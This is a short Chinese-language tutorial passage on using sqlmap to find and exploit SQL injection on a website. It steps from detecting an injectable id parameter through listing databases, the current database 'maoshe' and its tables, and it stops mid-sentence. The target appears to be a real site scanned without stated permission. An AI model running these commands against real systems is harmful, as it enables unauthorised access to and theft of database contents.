SQLMap扫描不安全web网站的流程
首先收集到目标的网址 此处我不做展示
打开linux 上的终端输入 sqlmap -u "url"
对目标网址进行扫描
发现目标存在漏洞(其id是可注入的)
接着我们输入sqlmap -u "url" --dbs
来查询目标的数据库 我查询到了三个
接着我们来看一些我们所浏览的页面(url)在哪个数据库中
输入sqlmap -u "url" --current-db
发现在 maoshe中
接着我们来查询maoshe中的数据表
输入sqlmap -u "url" -D "maoshe" --tables
发现其数据库下有四个表 然后我们来浏览数据表中的字段(